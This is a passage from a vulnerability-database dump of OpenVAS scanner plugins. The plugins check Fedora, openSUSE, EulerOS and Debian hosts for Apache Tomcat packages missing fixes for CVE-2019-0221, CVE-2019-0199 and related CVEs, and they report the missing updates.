rpm:\"tomcat-admin-webapps~9.0.10~1.h3.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-3.0-api\", rpm:\"tomcat-el-3.0-api~9.0.10~1.h3.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2.3-api\", rpm:\"tomcat-jsp-2.3-api~9.0.10~1.h3.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~9.0.10~1.h3.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-servlet-4.0-api\", rpm:\"tomcat-servlet-4.0-api~9.0.10~1.h3.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-06-27T14:42:44", "description": "The remote host is missing an update\n for the ", "cvss3": {}, "published": "2019-06-25T00:00:00", "type": "openvas", "title": "Fedora Update for tomcat FEDORA-2019-1a3f878d27", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221"], "modified": "2019-06-27T00:00:00", "id": "OPENVAS:1361412562310876532", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876532", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876532\");\n script_version(\"2019-06-27T06:30:18+0000\");\n script_cve_id(\"CVE-2019-0221\", \"CVE-2019-0199\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-06-27 06:30:18 +0000 (Thu, 27 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-25 02:17:36 +0000 (Tue, 25 Jun 2019)\");\n script_name(\"Fedora Update for tomcat FEDORA-2019-1a3f878d27\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-1a3f878d27\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZQTZ5BJ5F4KV6N53SGNKSW3UY5DBIQ46\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update\n for the 'tomcat' package(s) announced via the FEDORA-2019-1a3f878d27\n advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Tomcat is the servlet container that is\n used in the official Reference Implementation for the Java Servlet and\n JavaServer Pages technologies. The Java Servlet and JavaServer Pages\n specifications are developed by Sun under the Java Community Process.\n\nTomcat is developed in an open and participatory environment and\nreleased under the Apache Software License version 2.0. Tomcat is intended\nto be a collaboration of the best-of-breed developers from around the world.\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~9.0.21~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-31T16:48:38", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-07-01T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for tomcat (openSUSE-SU-2019:1673-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852602", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852602", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852602\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-0199\", \"CVE-2019-0221\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-07-01 02:00:38 +0000 (Mon, 01 Jul 2019)\");\n script_name(\"openSUSE: Security Advisory for tomcat (openSUSE-SU-2019:1673-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:1673-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-06/msg00090.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the openSUSE-SU-2019:1673-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for tomcat to version 9.0.20 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-0199: Fixed a denial of service in the HTTP/2 implementation\n related to streams with excessive numbers of SETTINGS frames\n (bsc#1131055).\n\n - CVE-2019-0221: Fixed a cross site scripting vulnerability with the SSI\n printenv command (bsc#1136085).\n\n Non-security issues fixed:\n\n - Increase maximum number of threads and open files for tomcat\n (bsc#1111966).\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2019-1673=1\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~9.0.20~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~9.0.20~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-docs-webapp\", rpm:\"tomcat-docs-webapp~9.0.20~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-3_0-api\", rpm:\"tomcat-el-3_0-api~9.0.20~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-embed\", rpm:\"tomcat-embed~9.0.20~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-javadoc\", rpm:\"tomcat-javadoc~9.0.20~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2_3-api\", rpm:\"tomcat-jsp-2_3-api~9.0.20~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsvc\", rpm:\"tomcat-jsvc~9.0.20~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~9.0.20~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-servlet-4_0-api\", rpm:\"tomcat-servlet-4_0-api~9.0.20~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~9.0.20~lp150.2.19.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-02-20T18:44:11", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2019-2047)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11784", "CVE-2019-0221"], "modified": "2020-02-18T00:00:00", "id": "OPENVAS:1361412562311220192047", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192047", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2047\");\n script_version(\"2020-02-18T11:13:49+0000\");\n script_cve_id(\"CVE-2018-11784\", \"CVE-2019-0221\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-02-18 11:13:49 +0000 (Tue, 18 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:32:24 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2019-2047)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2047\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2047\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'tomcat' package(s) announced via the EulerOS-SA-2019-2047 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.(CVE-2019-0221)\n\nWhen the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to '/foo/' when the user requested '/foo') a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice.(CVE-2018-11784)\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~7.0.76~8.h4\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~7.0.76~8.h4\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-2.2-api\", rpm:\"tomcat-el-2.2-api~7.0.76~8.h4\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2.2-api\", rpm:\"tomcat-jsp-2.2-api~7.0.76~8.h4\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~7.0.76~8.h4\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-servlet-3.0-api\", rpm:\"tomcat-servlet-3.0-api~7.0.76~8.h4\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~7.0.76~8.h4\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-01-31T16:30:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-01-09T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for tomcat (openSUSE-SU-2019:1808-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852859", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852859", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852859\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-0199\", \"CVE-2019-0221\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-09 09:38:12 +0000 (Thu, 09 Jan 2020)\");\n script_name(\"openSUSE: Security Advisory for tomcat (openSUSE-SU-2019:1808-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:1808-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-07/msg00054.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat'\n package(s) announced via the openSUSE-SU-2019:1808-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for tomcat to version 9.0.21 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-0199: Fixed a denial of service in the HTTP/2 implementation\n related to streams with excessive numbers of SETTINGS frames\n (bsc#1131055).\n\n - CVE-2019-0221: Fixed a cross site scripting vulnerability with the SSI\n printenv command (bsc#1136085).\n\n Non-security issues fixed:\n\n - Increase maximum number of threads and open files for tomcat\n (bsc#1111966).\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.1:\n\n zypper in -t patch openSUSE-2019-1808=1\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~9.0.21~lp151.3.3.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~9.0.21~lp151.3.3.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-docs-webapp\", rpm:\"tomcat-docs-webapp~9.0.21~lp151.3.3.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-3_0-api\", rpm:\"tomcat-el-3_0-api~9.0.21~lp151.3.3.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-embed\", rpm:\"tomcat-embed~9.0.21~lp151.3.3.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-javadoc\", rpm:\"tomcat-javadoc~9.0.21~lp151.3.3.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2_3-api\", rpm:\"tomcat-jsp-2_3-api~9.0.21~lp151.3.3.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsvc\", rpm:\"tomcat-jsvc~9.0.21~lp151.3.3.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~9.0.21~lp151.3.3.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-servlet-4_0-api\", rpm:\"tomcat-servlet-4_0-api~9.0.21~lp151.3.3.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~9.0.21~lp151.3.3.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-07-12T14:46:05", "description": "The remote host is missing an update for the\n ", "cvss3": {}, "published": "2019-07-05T00:00:00", "type": "openvas", "title": "Fedora Update for tomcat FEDORA-2019-d66febb5df", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0199", "CVE-2018-11784", "CVE-2019-0221"], "modified": "2019-07-11T00:00:00", "id": "OPENVAS:1361412562310876556", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876556", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876556\");\n script_version(\"2019-07-11T11:32:19+0000\");\n script_cve_id(\"CVE-2019-0221\", \"CVE-2019-0199\", \"CVE-2018-11784\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-11 11:32:19 +0000 (Thu, 11 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-07-05 02:21:34 +0000 (Fri, 05 Jul 2019)\");\n script_name(\"Fedora Update for tomcat FEDORA-2019-d66febb5df\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-d66febb5df\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NPHQEL5AQ6LZSZD2Y6TYZ4RC3WI7NXJ3\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'tomcat' package(s) announced via the FEDORA-2019-d66febb5df advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Tomcat is the servlet container that is used\n in the official Reference Implementation for the Java Servlet and JavaServer\n Pages technologies. The Java Servlet and JavaServer Pages specifications are\n developed by Sun under the Java Community Process.\n\nTomcat is developed in an open and participatory environment and\nreleased under the Apache Software License version 2.0. Tomcat is intended\nto be a collaboration of the best-of-breed developers from around the world.\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~9.0.21~1.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-01-29T19:25:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-08-14T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for tomcat8 (DLA-1883-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8014", "CVE-2016-5388", "CVE-2019-0221"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891883", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891883", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891883\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-5388\", \"CVE-2018-8014\", \"CVE-2019-0221\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-08-14 02:00:17 +0000 (Wed, 14 Aug 2019)\");\n script_name(\"Debian LTS: Security Advisory for tomcat8 (DLA-1883-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/08/msg00015.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1883-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/929895\");\n 